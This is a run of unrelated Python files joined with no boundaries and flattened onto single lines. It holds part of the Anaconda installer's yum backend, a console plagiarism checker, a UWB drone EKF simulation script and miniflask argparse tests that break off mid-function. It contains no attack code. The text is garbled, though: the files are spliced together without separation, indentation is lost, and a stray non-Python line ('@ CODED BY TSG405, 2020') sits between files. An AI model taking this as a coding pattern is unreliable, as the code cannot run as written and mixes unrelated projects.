that needs it. if anaconda.isKickstart and (anaconda.id.ksdata.services.disabled or anaconda.id.ksdata.services.enabled) or \ anaconda.id.storage.services or anaconda.id.network.hasActiveIPoIBDevice(): self.selectPackage("chkconfig") def doPostSelection(self, anaconda): # Only solve dependencies on the way through the installer, not the way back. if anaconda.dir == DISPATCH_BACK: return dscb = YumDepSolveProgress(anaconda.intf, self.ayum) self.ayum.dsCallback = dscb # do some sanity checks for kernel and bootloader if not anaconda.id.getUpgrade(): # New installs only - upgrades will already have all this stuff. self.selectBestKernel(anaconda) map(self.selectPackage, anaconda.platform.packages) map(self.deselectPackage, anaconda.platform.excluded_packages) self.selectFSPackages(anaconda.id.storage) if anaconda.id.network.hasActiveIPoIBDevice(): self.selectPackage("rdma") self.selectAnacondaNeeds(anaconda) else: self.ayum.update() while True: try: (code, msgs) = self.ayum.buildTransaction() # If %packages --ignoremissing was given, don't bother # prompting for missing dependencies. if anaconda.isKickstart and anaconda.id.ksdata.packages.handleMissing == KS_MISSING_IGNORE: break if code == 1 and not anaconda.id.upgrade: # resolveDeps returns 0 if empty transaction, 1 if error, # 2 if success depprob = "\n".join(msgs) custom_buttons = [_("_Exit installer"), _("_Continue")] if not anaconda.isKickstart: custom_buttons.insert(1, _("_Back")) rc = anaconda.intf.detailedMessageWindow(_("Warning"), _("Some of the packages you have selected for " "install are missing dependencies or conflict " "with another package. You can exit the " "installation, go back and change your package " "selections, or continue installing these " "packages without their dependencies."), depprob + "\n", type="custom", custom_icon="error", custom_buttons=custom_buttons) dscb.pop() if rc == 0: sys.exit(1) elif rc == 1 and not anaconda.isKickstart: self.ayum._undoDepInstalls() return DISPATCH_BACK break except RepoError, e: # FIXME: would be nice to be able to recover here rc = anaconda.intf.messageWindow(_("Error"), _("Unable to read package metadata. This may be " "due to a missing repodata directory. Please " "ensure that your install tree has been " "correctly generated.\n\n%s" % e), type="custom", custom_icon="error", custom_buttons=[_("_Exit installer"), _("_Retry")]) dscb.pop() if rc == 0: sys.exit(0) else: continue else: break (self.dlpkgs, self.totalSize, self.totalFiles) = self.ayum.getDownloadPkgs() if not anaconda.id.upgrade: largePart = anaconda.id.storage.mountpoints.get("/usr", anaconda.id.storage.rootDevice) if largePart and largePart.size < self.totalSize / 1024: rc = anaconda.intf.messageWindow(_("Error"), _("Your selected packages require %d MB " "of free space for installation, but " "you do not have enough available. " "You can change your selections or " "exit the installer." 
% (self.totalSize / 1024)), type="custom", custom_icon="error", custom_buttons=[_("_Back"), _("_Exit installer")]) dscb.pop() if rc == 1: sys.exit(1) else: self.ayum._undoDepInstalls() return DISPATCH_BACK dscb.pop() if anaconda.mediaDevice and not anaconda.isKickstart: rc = presentRequiredMediaMessage(anaconda) if rc == 0: rc2 = anaconda.intf.messageWindow(_("Reboot?"), _("The system will be rebooted now."), type="custom", custom_icon="warning", custom_buttons=[_("_Back"), _("_Reboot")]) if rc2 == 1: sys.exit(0) else: return DISPATCH_BACK elif rc == 1: # they asked to go back return DISPATCH_BACK self.ayum.dsCallback = None def doPreInstall(self, anaconda): if anaconda.dir == DISPATCH_BACK: for d in ("/selinux", "/dev", "/proc/bus/usb"): try: isys.umount(anaconda.rootPath + d, removeDir = False) except Exception, e: log.error("unable to unmount %s: %s" %(d, e)) return # shorthand upgrade = anaconda.id.getUpgrade() if upgrade: # An old mtab can cause confusion (esp if loop devices are # in it). Be extra special careful and delete any mtab first, # in case the user has done something funny like make it into # a symlink. if os.access(anaconda.rootPath + "/etc/mtab", os.F_OK): os.remove(anaconda.rootPath + "/etc/mtab") f = open(anaconda.rootPath + "/etc/mtab", "w+") f.close() # we really started writing modprobe.conf out before things were # all completely ready. so now we need to nuke old modprobe.conf's # if you're upgrading from a 2.4 dist so that we can get the # transition right if (os.path.exists(anaconda.rootPath + "/etc/modules.conf") and os.path.exists(anaconda.rootPath + "/etc/modprobe.conf") and not os.path.exists(anaconda.rootPath + "/etc/modprobe.conf.anacbak")): log.info("renaming old modprobe.conf -> modprobe.conf.anacbak") os.rename(anaconda.rootPath + "/etc/modprobe.conf", anaconda.rootPath + "/etc/modprobe.conf.anacbak") dirList = ['/var', '/var/lib', '/var/lib/rpm', '/tmp', '/dev', '/etc', '/etc/sysconfig', '/etc/sysconfig/network-scripts', '/etc/X11', '/root', '/var/tmp', '/etc/rpm', '/var/cache', '/var/cache/yum', '/etc/modprobe.d'] # If there are any protected partitions we want to mount, create their # mount points now. 
for protected in anaconda.id.storage.protectedDevices: if getattr(protected.format, "mountpoint", None): dirList.append(protected.format.mountpoint) for i in dirList: try: os.mkdir(anaconda.rootPath + i) except os.error, (errno, msg): pass # log.error("Error making directory %s: %s" % (i, msg)) self.initLog(anaconda.id, anaconda.rootPath) # setup /etc/rpm/ for the post-install environment iutil.writeRpmPlatform(anaconda.rootPath) try: # FIXME: making the /var/lib/rpm symlink here is a hack to # workaround db->close() errors from rpm iutil.mkdirChain("/var/lib") for path in ("/var/tmp", "/var/lib/rpm"): if os.path.exists(path) and not os.path.islink(path): shutil.rmtree(path) if not os.path.islink(path): os.symlink("%s/%s" %(anaconda.rootPath, path), "%s" %(path,)) else: log.warning("%s already exists as a symlink to %s" %(path, os.readlink(path),)) except Exception, e: # how this could happen isn't entirely clear; log it in case # it does and causes problems later log.error("error creating symlink, continuing anyway: %s" %(e,)) # SELinux hackery (#121369) if flags.selinux: try: os.mkdir(anaconda.rootPath + "/selinux") except Exception, e: pass try: isys.mount("/selinux", anaconda.rootPath + "/selinux", "selinuxfs") except Exception, e: log.error("error mounting selinuxfs: %s" %(e,)) # For usbfs try: isys.mount("/proc/bus/usb", anaconda.rootPath + "/proc/bus/usb", "usbfs") except Exception, e: log.error("error mounting usbfs: %s" %(e,)) # write out the fstab if not upgrade: anaconda.id.storage.fsset.write(anaconda.rootPath) if os.access("/etc/modprobe.d/anaconda.conf", os.R_OK): shutil.copyfile("/etc/modprobe.d/anaconda.conf", anaconda.rootPath + "/etc/modprobe.d/anaconda.conf") anaconda.id.network.write() anaconda.id.network.copyConfigToPath(instPath=anaconda.rootPath) anaconda.id.storage.write(anaconda.rootPath) if not anaconda.id.isHeadless: anaconda.id.keyboard.write(anaconda.rootPath) # make a /etc/mtab so mkinitrd can handle certain hw (usb) correctly f = open(anaconda.rootPath + "/etc/mtab", "w+") f.write(anaconda.id.storage.mtab) f.close() def checkSupportedUpgrade(self, anaconda): if anaconda.dir == DISPATCH_BACK: return self._checkUpgradeVersion(anaconda) self._checkUpgradeArch(anaconda) def _checkUpgradeVersion(self, anaconda): # Figure out current version for upgrade nag and for determining weird # upgrade cases supportedUpgradeVersion = -1 for pkgtup in self.ayum.rpmdb.whatProvides('redhat-release', None, None): n, a, e, v, r = pkgtup if supportedUpgradeVersion <= 0: val = rpmUtils.miscutils.compareEVR((None, '3', '1'), (e, v,r)) if val > 0: supportedUpgradeVersion = 0 else: supportedUpgradeVersion = 1 break if "Red Hat Enterprise Linux" not in productName: supportedUpgradeVersion = 1 if supportedUpgradeVersion == 0: rc = anaconda.intf.messageWindow(_("Warning"), _("You appear to be upgrading from a system " "which is too old to upgrade to this " "version of %s. 
Are you sure you wish to " "continue the upgrade " "process?") %(productName,), type = "yesno") if rc == 0: iutil.resetRpmDb(anaconda.rootPath) sys.exit(0) def _checkUpgradeArch(self, anaconda): def compareArch(a, b): if re.match("i.86", a) and re.match("i.86", b): return True else: return a == b # get the arch of the initscripts package try: pkgs = self.ayum.pkgSack.returnNewestByName('initscripts') except yum.Errors.PackageSackError: log.info("no packages named initscripts") return None pkgs = self.ayum.bestPackagesFromList(pkgs) if len(pkgs) == 0: log.info("no best package") return myarch = pkgs[0].arch log.info("initscripts is arch: %s" %(myarch,)) for po in self.ayum.rpmdb.getProvides('initscripts'): log.info("po.arch is arch: %s" %(po.arch,)) if not compareArch(po.arch, myarch): rc = anaconda.intf.messageWindow(_("Warning"), _("The arch of the release of %(productName)s you " "are upgrading to appears to be %(myarch)s which " "does not match your previously installed arch of " "%(arch)s. This is likely to not succeed. Are " "you sure you wish to continue the upgrade " "process?") % {'productName': productName, 'myarch': myarch, 'arch': po.arch}, type="yesno") if rc == 0: iutil.resetRpmDb(anaconda.rootPath) sys.exit(0) else: log.warning("upgrade between possibly incompatible " "arches %s -> %s" %(po.arch, myarch)) break def doInstall(self, anaconda): log.info("Preparing to install packages") if not anaconda.id.upgrade: rpm.addMacro("__dbi_htconfig", "hash nofsync %{__dbi_other} %{__dbi_perms}") if anaconda.isKickstart and anaconda.id.ksdata.packages.excludeDocs: rpm.addMacro("_excludedocs", "1") if anaconda.isKickstart and anaconda.id.ksdata.packages.instLangs is not None: # Use nil if instLangs is empty rpm.addMacro('_install_langs', anaconda.id.ksdata.packages.instLangs or '%{nil}') cb = AnacondaCallback(self.ayum, anaconda, self.instLog, self.modeText) cb.setSizes(len(self.dlpkgs), self.totalSize, self.totalFiles) rc = self.ayum.run(self.instLog, cb, anaconda.intf, anaconda.id) if cb.initWindow is not None: cb.initWindow.pop() self.instLog.write("*** FINISHED INSTALLING PACKAGES ***") self.instLog.close () anaconda.id.instProgress = None if rc == DISPATCH_BACK: return DISPATCH_BACK def doPostInstall(self, anaconda): if anaconda.id.getUpgrade(): w = anaconda.intf.waitWindow(_("Post Upgrade"), _("Performing post-upgrade configuration")) else: w = anaconda.intf.waitWindow(_("Post Installation"), _("Performing post-installation configuration")) packages.rpmSetupGraphicalSystem(anaconda) for repo in self.ayum.repos.listEnabled(): repo.dirCleanup() # expire yum caches on upgrade if (flags.cmdline.has_key("preupgrade") or anaconda.id.getUpgrade()) and os.path.exists("%s/var/cache/yum" %(anaconda.rootPath,)): log.info("Expiring yum caches") try: iutil.execWithRedirect("yum", ["clean", "all"], stdout="/dev/tty5", stderr="/dev/tty5", root = anaconda.rootPath) except: pass # nuke preupgrade if flags.cmdline.has_key("preupgrade") and os.path.exists("%s/var/cache/yum/anaconda-upgrade" %(anaconda.rootPath,)): try: shutil.rmtree("%s/var/cache/yum/anaconda-upgrade" %(anaconda.rootPath,)) except: pass # XXX: write proper lvm config AnacondaBackend.doPostInstall(self, anaconda) w.pop() def kernelVersionList(self, rootPath="/"): # FIXME: using rpm here is a little lame, but otherwise, we'd # be pulling in filelists return packages.rpmKernelVersionList(rootPath) def __getGroupId(self, group): """Get the groupid for the given name (english or translated).""" for g in self.ayum.comps.groups: if group == 
g.name: return g.groupid for trans in g.translated_name.values(): if group == trans: return g.groupid def isGroupSelected(self, group): try: grp = self.ayum.comps.return_group(group) if grp.selected: return True except yum.Errors.GroupsError, e: pass return False def selectGroup(self, group, *args): if not self.ayum.comps.has_group(group): log.debug("no such group %s" % group) raise NoSuchGroup, group types = ["mandatory"] if args: if args[0][0]: types.append("default") if args[0][1]: types.append("optional") else: types.append("default") try: mbrs = self.ayum.selectGroup(group, group_package_types=types) if len(mbrs) == 0 and self.isGroupSelected(group): return except yum.Errors.GroupsError, e: # try to find out if it's the name or translated name gid = self.__getGroupId(group) if gid is not None: mbrs = self.ayum.selectGroup(gid, group_package_types=types) if len(mbrs) == 0 and self.isGroupSelected(gid): return else: log.debug("no such group %s" %(group,)) raise NoSuchGroup, group def deselectGroup(self, group, *args): try: self.ayum.deselectGroup(group, force=True) except yum.Errors.GroupsError, e: # try to find out if it's the name or translated name gid = self.__getGroupId(group) if gid is not None: self.ayum.deselectGroup(gid, force=True) else: log.debug("no such group %s" %(group,)) def selectPackage(self, pkg, *args): try: mbrs = self.ayum.install(pattern=pkg) return len(mbrs) except yum.Errors.InstallError: log.debug("no package matching %s" %(pkg,)) return 0 def deselectPackage(self, pkg, *args): sp = pkg.rsplit(".", 2) txmbrs = [] if len(sp) == 2: txmbrs = self.ayum.tsInfo.matchNaevr(name=sp[0], arch=sp[1]) if len(txmbrs) == 0: exact, match, unmatch = yum.packages.parsePackages(self.ayum.pkgSack.returnPackages(), [pkg], casematch=1) for p in exact + match: txmbrs.append(p) if len(txmbrs) > 0: for x in txmbrs: self.ayum.tsInfo.remove(x.pkgtup) # we also need to remove from the conditionals # dict so that things don't get pulled back in as a result # of them. yes, this is ugly. conditionals should die. for req, pkgs in self.ayum.tsInfo.conditionals.iteritems(): if x in pkgs: pkgs.remove(x) self.ayum.tsInfo.conditionals[req] = pkgs return len(txmbrs) else: log.debug("no such package %s to remove" %(pkg,)) return 0 def groupListExists(self, grps): """Returns bool of whether all of the given groups exist.""" for gid in grps: g = self.ayum.comps.return_group(gid) if not g: log.debug("no such group %s" % (gid,)) return False return True def groupListDefault(self, grps): """Returns bool of whether all of the given groups are default""" rc = False for gid in grps: g = self.ayum.comps.return_group(gid) if g and not g.default: return False elif g: rc = True return rc def writeKS(self, f): for repo in self.ayum.repos.listEnabled(): if repo.name == "Installation Repo": continue if repo.name == "Red Hat Enterprise Linux": continue # If this is a media install, give the enabled addon a special "addon" # baseurl. anaconda will understand this when it reads in the kickstart # file and know what to do. This does not require changes to pykickstart. 
if repo.anacondaBaseURLs[0].startswith("file://"): repo.baseurl = "file://anaconda-addon" repo.mirrorlist = [] repo.cost = None line = "repo --name=\"%s\" " % (repo.name or repo.repoid) if repo.baseurl: line += " --baseurl=%s" % repo.anacondaBaseURLs[0] else: line += " --mirrorlist=%s" % repo.mirrorlist if repo.proxy: line += " --proxy=\"%s\"" % repo.proxy_dict['http'] if repo.cost: line += " --cost=%s" % repo.cost if repo.includepkgs: line += " --includepkgs=\"%s\"" % ",".join(repo.includepkgs) if repo.exclude: line += " --excludepkgs=\"%s\"" % ",".join(repo.exclude) if not repo.sslverify: line += " --noverifyssl" line += "\n" f.write(line) def writePackagesKS(self, f, anaconda): if anaconda.isKickstart: f.write(anaconda.id.ksdata.packages.__str__()) return groups = [] installed = [] removed = [] # Faster to grab all the package names up front rather than call # searchNevra in the loop below. allPkgNames = map(lambda pkg: pkg.name, self.ayum.pkgSack.returnPackages()) allPkgNames.sort() # On CD/DVD installs, we have one transaction per CD and will end up # checking allPkgNames against a very short list of packages. So we # have to reset to media #0, which is an all packages transaction. old = self.ayum.tsInfo.curmedia self.ayum.tsInfo.curmedia = 0 self.ayum.tsInfo.makelists() txmbrNames = map (lambda x: x.name, self.ayum.tsInfo.getMembers()) self.ayum.tsInfo.curmedia = old if len(self.ayum.tsInfo.instgroups) == 0 and len(txmbrNames) == 0: return for grp in filter(lambda x: x.selected, self.ayum.comps.groups): groups.append(grp.groupid) defaults = grp.default_packages.keys() + grp.mandatory_packages.keys() optionals = grp.optional_packages.keys() for pkg in filter(lambda x: x in defaults and (not x in txmbrNames and x in allPkgNames), grp.packages): removed.append(pkg) for pkg in filter(lambda x: x in txmbrNames, optionals): installed.append(pkg) if len(groups) == 1 and groups[0].lower() == "core": f.write("\n%packages --nobase\n") else: f.write("\n%packages\n") for grp in groups: f.write("@%s\n" % grp) for pkg in installed: f.write("%s\n" % pkg) for pkg in removed: f.write("-%s\n" % pkg) f.write("%end") def writeConfiguration(self): return def getRequiredMedia(self): return self.ayum.tsInfo.reqmedia.keys() class DownloadHeaderProgress: def __init__(self, intf, ayum=None): window = intf.progressWindow(_("Installation Starting"), _("Starting installation process"), 1.0, 0.01) self.window = window self.ayum = ayum self.current = self.loopstart = 0 self.incr = 1 if self.ayum is not None and self.ayum.tsInfo is not None: self.numpkgs = len(self.ayum.tsInfo.getMembers()) if self.numpkgs != 0: self.incr = (1.0 / self.numpkgs) * (1.0 - self.loopstart) else: self.numpkgs = 0 self.refresh() self.restartLoop = self.downloadHeader = self.transactionPopulation = self.refresh self.procReq = self.procConflict = self.unresolved = self.noop def noop(self, *args, **kwargs): pass def pkgAdded(self, *args): if self.numpkgs: self.set(self.current + self.incr) def pop(self): self.window.pop() def refresh(self, *args): self.window.refresh() def set(self, value): self.current = value self.window.set(self.current) class YumDepSolveProgress: def __init__(self, intf, ayum = None): window = intf.progressWindow(_("Dependency Check"), _("Checking dependencies in packages selected for installation"), 1.0, 0.01) self.window = window self.numpkgs = None self.loopstart = None self.incr = None self.ayum = ayum self.current = 0 self.restartLoop = self.downloadHeader = self.transactionPopulation = self.refresh self.procReq = 
self.procConflict = self.unresolved = self.noop def tscheck(self, num = None): self.refresh() if num is None and self.ayum is not None and self.ayum.tsInfo is not None: num = len(self.ayum.tsInfo.getMembers()) if num: self.numpkgs = num self.loopstart = self.current self.incr = (1.0 / num) * ((1.0 - self.loopstart) / 2) def pkgAdded(self, *args): if self.numpkgs: self.set(self.current + self.incr) def noop(self, *args, **kwargs): pass def refresh(self, *args): self.window.refresh() def set(self, value): self.current = value self.window.set(self.current) def start(self): self.set(0.0) self.refresh() def end(self): self.window.set(1.0) self.window.refresh() def pop(self): self.window.pop() # We don't have reasonable hook for sackSetup, and it # is fairly fast, so we use just waitWindow here class SackSetupProgress: def __init__(self, intf): self.intf = intf def connect(self, repo): if repo.name is None: txt = _("Retrieving installation information.") else: txt = _("Retrieving installation information for %s.")%(repo.name) self.window = self.intf.waitWindow(_("Installation Progress"), txt) def disconnect(self): self.window.pop() class RepoSetupPulseProgress: def __init__(self, intf): self.intf = intf self.repo = None def connect(self, repo): self.repo = repo if repo.name is None: txt = _("Retrieving installation information.") else: txt = _("Retrieving installation information for %s.")%(repo.name) self.window = self.intf.progressWindow(_("Installation Progress"), txt, 1.0, pulse=True) repo.setCallback(self) def disconnect(self): self.window.pop() self.repo.setCallback(None) def refresh(self, *args): self.window.refresh() def set(self): self.window.pulse() def start(self, filename, url, basename, size, text): log.debug("Grabbing %s" % url) self.set() self.refresh() def update(self, read): self.set() self.refresh() def end(self, read): self.set() self.window.refresh() import time import re import math # Main Function.. def plag_ana(): unique = [] print("\n------------------------------------------------------------\n ----***---- Welcome to the PLAGIARISM ANALYSER ----***----\n------------------------------------------------------------\n ") text = input("\nEnter your text: \t") user_input = text.lower() query = re.sub("[^\w]"," ",user_input).split() for t in query: if t not in unique: unique.append(t) # Parsing the database of list of words [sample] sample = open("sample.txt", "r") da = sample.read().lower() database = re.sub("[^\w]", " ",da).split() for t in database: if t not in unique: unique.append(t) t_array1 = [] t_array2 = [] mult = 0 for word in unique: t_array1Counter = 0 t_array2Counter = 0 for tt in query: if tt == word: t_array1Counter += 1 t_array1.append(t_array1Counter) for tt in database: if tt == word: t_array2Counter += 1 t_array2.append(t_array2Counter) for i in range (len(t_array1)): mult += t_array1[i] * t_array2[i] Vectordatabase = 0 for i in range (len(t_array2)): Vectordatabase += t_array2[i]**2 Vectordatabase = math.sqrt(Vectordatabase) Vectorquery = 0 for i in range (len(t_array1)): Vectorquery += t_array1[i]**2 Vectorquery = math.sqrt(Vectorquery) result = ((float)(mult / (Vectorquery * Vectordatabase)) * 100) print("\nPlease Wait...") time.sleep(3) if result>=70.0: print("!! WARNING: !!Plagiarized!! [HIGH], analysed percentage: ({}) % ".format(result)) elif result<70.0 and result>=30.0: print("!!Plagiarized!! [MEDIUM], analysed percentage: ({}) % ".format(result)) elif result<30.0 and result>0.0: print("!!Plagiarized!! 
[LOW], analysed percentage: ({}) % ".format(result)) else: print("!! GOOD TO GO !! analysed percentage: ({}) % ".format(result)) # Driver Code p=0 while 1: if (p==0): plag_ana() p=1 bb=input("\nWant to analyse again?? please press [Y/N] :\t ") if (bb.lower() == 'yes' or bb.lower() =='y'): plag_ana() elif (bb.lower() =='no' or bb.lower() =='n'): print("\n !THANK YOU! ~ TSG405") break else: print("\n!INVALID INPUT! Please try again!") @ CODED BY TSG405, 2020 """Collect data for comparison of MHE and EKF with different number of anchors This script simulates the performance of MHE and EKF on the trajectories in the data/publication_run folder. For each file, the number of anchors is varied between 1-8 for TWR and 2-8 for TDOA. Every number of anchor is tested in 10 runs with the anchors chosen randomly for every run. The position RMSE for both MHE and EKF is recorded in a csv file that can then be used to generate plots with the 'publication_plots.py' script. """ import os import yaml import numpy as np import random import time start_time = time.time() import UWBsim from UWBsim.airframe.drone import Drone from UWBsim.utils.uwb_ranging import RangingType, RangingSource from UWBsim.simulation import UWBSimulation, SimulationParams # Script settings SEE LINE 58 #N_helpers = 4 #Na = 4 #InputNr = 0 #simulation_type = 1 runs_per_traj_file = 5 mode = 'tdoa' data_folder = os.path.join(UWBsim.DATA_DIR) anchor_file = os.path.join(UWBsim.BASE_DIR, 'anchor_positions.yaml') publication_folder = os.path.dirname(os.path.realpath(__file__)) # Set Estimator parameters params = SimulationParams() params.estimators.ekf.enable = True params.estimators.ekf.rate = 100 params.drone.altitude_enable = True if mode == 'twr': n_anchors = [1, 2, 3, 4, 5, 6, 7, 8] params.ranging.rtype = RangingType.TWR params.estimators.ekf.outlierThreshold = 1500 elif mode == 'tdoa': n_anchors = [2, 3, 4, 5, 6, 7, 8] params.ranging.rtype = RangingType.TDOA params.estimators.ekf.outlierThreshold = 25 with open(anchor_file) as f: positions = yaml.safe_load(f) params.ranging.anchor_positions = [] for key, pos in positions.items(): i = int(key) params.ranging.anchor_positions.append([pos['x'], pos['y'], pos['z']]) params.ranging.source = RangingSource.LOG i = 0 publication_folder_hip = os.path.join(publication_folder, str(mode) + str(i)) while os.path.isdir(publication_folder_hip): publication_folder_hip = os.path.join(publication_folder, str(mode) + str(i)) i += 1 output_file = os.path.join(publication_folder_hip, 'runs_data.csv'.format(mode)) drone_log_file_directory = os.path.join(publication_folder_hip, "DronePosLog") """ # Save parameters for later reference settings_file = output_file.split('.')[0] + '_settings.yaml' with open(settings_file, 'w') as f: yaml.dump(params, f) """ # Global variables for error calculation and drone tracking # mhe_error_sum2 = np.array([0.0,0.0,0.0]) ekf_error_sum2 = np.array([0.0, 0.0, 0.0]) error_count = 0 ekf_error_count = 0 drone_full_x_log = np.empty((60000, 7)) ###drone_full_x_log2 = np.empty((0,4)) def data_callback(drone: Drone): """Record the simulation output in the scripts global variables This function is passed to the simulation and is called at every simulation step. It records the true and estimated states of MHE and EKF in the scripts global variables, so that the performance can be calculated at the end of the simulation. 
""" global error_count, ekf_error_count, ekf_error_sum2, drone_full_x_log ###, drone_full_x_log2#, mhe_error_sum2 # wait a moment before starting error calculation (calibration) if drone.time > 1.0: x = drone.state_true.x[0] y = drone.state_true.x[1] z = drone.state_true.x[2] drone_flight_info = np.array( [np.hstack((drone.time, drone.state_estimate["ekf"].x[0:3], drone.state_true.x[0:3]))]) ###print("EKF X", drone.state_estimate["ekf"].x) ###print(np.transpose(drone.estimators["ekf"].xi[0:3])) drone_full_x_log[error_count] = drone_flight_info # drone_full_x_log = np.append(drone_full_x_log, drone_flight_info, axis=0) #######print(drone_full_x_log[-1]) ###drone_full_x_log2 = np.append(drone_full_x_log2, np.array(drone.time, np.transpose(drone.estimators["ekf"].xi[0:3])), axis=0) error_count += 1 """ if drone.estimator_isEnabled['mhe']: mhe_error_sum2[0] += (x - drone.state_estimate['mhe'].x[0])**2 mhe_error_sum2[1] += (y - drone.state_estimate['mhe'].x[1])**2 mhe_error_sum2[2] += (z - drone.state_estimate['mhe'].x[2])**2 """ if drone.estimator_isEnabled['ekf'] and z > 0.1: ekf_error_count += 1 ekf_error_sum2[0] += (x - drone.state_estimate['ekf'].x[0]) ** 2 ekf_error_sum2[1] += (y - drone.state_estimate['ekf'].x[1]) ** 2 ekf_error_sum2[2] += (z - drone.state_estimate['ekf'].x[2]) ** 2 for input_file in os.listdir(publication_folder): if "anchors_" in input_file: Na = int(input_file[8]) N_helpers = int(input_file[-7]) if N_helpers == 0: simulation_type = 0 else: simulation_type = 1 params.ranging.anchor_enable = [Na > 0, Na > 4, Na > 1, Na > 5, Na > 6, Na > 2, Na > 7, Na > 3] for folder in os.listdir(input_file): print('Reading from: {}'.format(os.path.join(input_file, folder))) print(os.path.join(data_folder, folder + ".csv")) params.drone.logfile = os.path.join(data_folder, folder + ".csv") params.drone.helper_file = os.path.join(input_file, folder) params.ranging.simulation_type = simulation_type f_out = open(os.path.join(input_file, folder, "DroneUser_runs_data" + str(simulation_type)) + ".csv", "w") f_out.write('log, anchors, run, ekf_tot, ekfX, ekfY, ekfZ, logfile\n') for run in range(runs_per_traj_file): # anchor_idx_en = random.sample(range(8), Na) # for a_idx in range(Na): # params.ranging.anchor_enable[a_idx] = True if simulation_type == 0: params.name = folder + '_SOLO' + '_r' + str(run) elif simulation_type == 1: params.name = folder + '_h' + str(N_helpers) + '_r' + str(run) # Reset error calculation error_count = 0 # mhe_error_sum2[0] = 0 # mhe_error_sum2[1] = 0 # mhe_error_sum2[2] = 0 ekf_error_sum2[0] = 0 ekf_error_sum2[1] = 0 ekf_error_sum2[2] = 0 # Reset drone x array drone_full_x_log = np.empty((60000, 7)) ###drone_full_x_log2 = np.empty((0,4)) # Run simulation sim = UWBSimulation(params, NotImplemented, data_callback) try: sim.start_sim() # mheX = np.sqrt(mhe_error_sum2[0]/error_count) # mheY = np.sqrt(mhe_error_sum2[1]/error_count) # mheZ = np.sqrt(mhe_error_sum2[2]/error_count) ekfX = np.sqrt(ekf_error_sum2[0] / error_count) ekfY = np.sqrt(ekf_error_sum2[1] / error_count) ekfZ = np.sqrt(ekf_error_sum2[2] / error_count) except AssertionError: # One of the estimators failed, try both individually # EKF only params.estimators.mhe.enable = False error_count = 0 ekf_error_sum2[0] = 0 ekf_error_sum2[1] = 0 ekf_error_sum2[2] = 0 try: sim = UWBSimulation(params, NotImplemented, data_callback) sim.start_sim() ekfX = np.sqrt(ekf_error_sum2[0] / error_count) ekfY = np.sqrt(ekf_error_sum2[1] / error_count) ekfZ = np.sqrt(ekf_error_sum2[2] / error_count) except AssertionError: ekfX 
= np.inf ekfY = np.inf ekfZ = np.inf finally: # params.estimators.mhe.enable = True pass # Calculate performance and write to output file # mhe_tot = np.sqrt(mheX**2 + mheY**2 + mheZ**2) ekf_tot = np.sqrt(ekfX ** 2 + ekfY ** 2 + ekfZ ** 2) f_out.write('{}, {}, {}, \ {:.5f}, {:.4f}, {:.4f}, {:.4f}, {}\n'.format( folder, Na, run, ekf_tot, ekfX, ekfY, ekfZ, os.path.join(input_file, folder) )) drone_full_x_log = drone_full_x_log[~np.all(drone_full_x_log == 0, axis=1)] np.savetxt(os.path.join(input_file, folder, "DroneUser_DronePosLog_SimType_" + str(simulation_type) + "_r" + str(run) + ".csv"), drone_full_x_log, header="time, estX, estY, estZ, trueX, trueY, trueZ", comments="", delimiter=",") ###np.save(os.path.join("C:\\Users\\<NAME>\\PycharmProjects\\numpytester\\savehere", ###"x_array" + str(Na) + str(run) + "BOO"), drone_full_x_log2) print("RUNTIME:", time.time() - start_time) f_out.close() <reponame>da-h/miniflask<filename>tests/argparse/list/test_argparse_list_overwrites.py from pathlib import Path import miniflask # noqa: [E402] def test_space(capsys): mf = miniflask.init( module_dirs=str(Path(__file__).parent / "modules"), debug=True ) mf.load("module1") mf.parse_args([ "--int1", "1337", "--int2", "-1337", "--float1", "1.234", "--float2", "-1.234", "--float3", "-0.0", "--float4", "0.0", "--float5", "3e5", "--float6", "-3e5", "--bool1", "False", "--bool2", "True", "--enum1", "small", "--str1", "abcd1234", "--str2", "αβγδ∀⇐Γ∂", "--str3", "" ]) captured = capsys.readouterr() mf.event.print_all() captured = capsys.readouterr() assert captured.out == """ modules.module1.int1: [1337] modules.module1.int2: [-1337] modules.module1.float1: [1.234] modules.module1.float2: [-1.234] modules.module1.float3: [-0.0] modules.module1.float4: [0.0] modules.module1.float5: [300000.0] modules.module1.float6: [-300000.0] modules.module1.bool1: [False] modules.module1.bool2: [True] modules.module1.enum1: [<SIZE.SMALL: 0>] modules.module1.str1: ['abcd1234'] modules.module1.str2: ['αβγδ∀⇐Γ∂'] modules.module1.str3: [''] """.lstrip() def test_equal(capsys): mf = miniflask.init( module_dirs=str(Path(__file__).parent / "modules"), debug=True ) mf.load("module1") mf.parse_args([ "--int1=1337", "--int2=-1337", "--float1=1.234", "--float2=-1.234", "--float3=-0.0", "--float4=0.0", "--float5=3e5", "--float6=-3e5", "--bool1=False", "--bool2=True", "--enum1=small", "--str1=abcd1234", "--str2=αβγδ∀⇐Γ∂", "--str3=" ]) captured = capsys.readouterr() mf.event.print_all() captured = capsys.readouterr() assert captured.out == """ modules.module1.int1: [1337] modules.module1.int2: [-1337] modules.module1.float1: [1.234] modules.module1.float2: [-1.234] modules.module1.float3: [-0.0] modules.module1.float4: [0.0] modules.module1.float5: [300000.0] modules.module1.float6: [-300000.0] modules.module1.bool1: [False] modules.module1.bool2: [True] modules.module1.enum1: [<SIZE.SMALL: 0>] modules.module1.str1: ['abcd1234'] modules.module1.str2: ['αβγδ∀⇐Γ∂'] modules.module1.str3: [''] """.lstrip() def test_bool_int(capsys): mf = miniflask.init( module_dirs=str(Path(__file__).parent / "modules"), debug=True ) mf.load("module1") mf.parse_args([ "--bool1=0", "--bool2=1", ]) captured = capsys.readouterr() mf.event.print_bool() captured = capsys.readouterr() assert captured.out == """ modules.module1.bool1: [False] modules.module1.bool2: [True] """.lstrip() def test_bool_yesno(capsys): mf = miniflask.init( module_dirs=str(Path(__file__).parent / "modules"), debug=True ) mf.load("module1") mf.parse_args([ "--bool1=no", "--bool2=yes", ]) 
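    # As in the neighbouring 0/1, t/f and true/false variants, the "yes"/"no"
    # strings passed above are coerced into real Python booleans, which the
    # print_bool event prints and the assertion below checks.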
